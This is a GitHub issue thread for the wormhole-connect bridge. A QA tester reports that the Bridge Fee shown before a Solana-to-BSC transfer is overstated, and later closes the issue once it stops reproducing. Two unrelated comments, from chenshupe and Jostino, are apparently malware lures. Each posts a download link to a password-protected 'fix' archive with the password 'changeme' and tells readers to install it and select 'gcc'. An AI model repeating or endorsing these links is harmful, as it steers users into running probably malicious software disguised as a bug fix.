### ISSUE TITLE
[QA] Incorrect Bridge Fee displayed before transaction, significantly higher than actual fee 

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#2455]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) with macOS Sonoma 14.6.1 and Google Chrome Version 127.0.6533.122 (Official Build) (x86_64).

Steps:

1. Select Solana network and SOL token in "From" section (Solflare wallet)
2. Select BSC network and BNB token in "To" section (MetaMask wallet)
3. Enter Amount, in my case 0.019
4. Observe the "Bridge Fee" displayed before confirming the transaction.
5. Complete the transaction successfully.
6. Compare the "Bridge Fee" displayed before and after the transaction.

Expected Result: The "Bridge Fee" displayed before the transaction should accurately reflect the actual fee that will be charged upon completion.

Actual Result: The "Bridge Fee" displayed before starting the transaction is significantly higher than the actual fee charged. The correct fee is only shown after the transaction is completed. 

## Attachments/Notes

Before:
<img width="1440" alt="Screenshot 2024-08-28 at 13 05 29" src="https://github.com/user-attachments/assets/961f999f-4a9c-4e76-b146-15ccb4039f3c">

After:
<img width="515" alt="Screenshot 2024-08-28 at 13 35 10" src="https://github.com/user-attachments/assets/188e4690-6029-4b33-a492-4d4f08b5cd18">

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wesleyleung** [comment]
This is currently being worked on by Kevin.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by agodlevska** [comment]
Issue is no longer reproducible on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D). 
The "Bridge Fee" displayed before the transaction should accurately reflect the actual fee. 

Closing the ticket.

Attachment:
<img width="532" alt="Screenshot 2024-09-06 at 11 55 34" src="https://github.com/user-attachments/assets/cecda78a-dde7-4471-80a1-0dc27779ccd4">
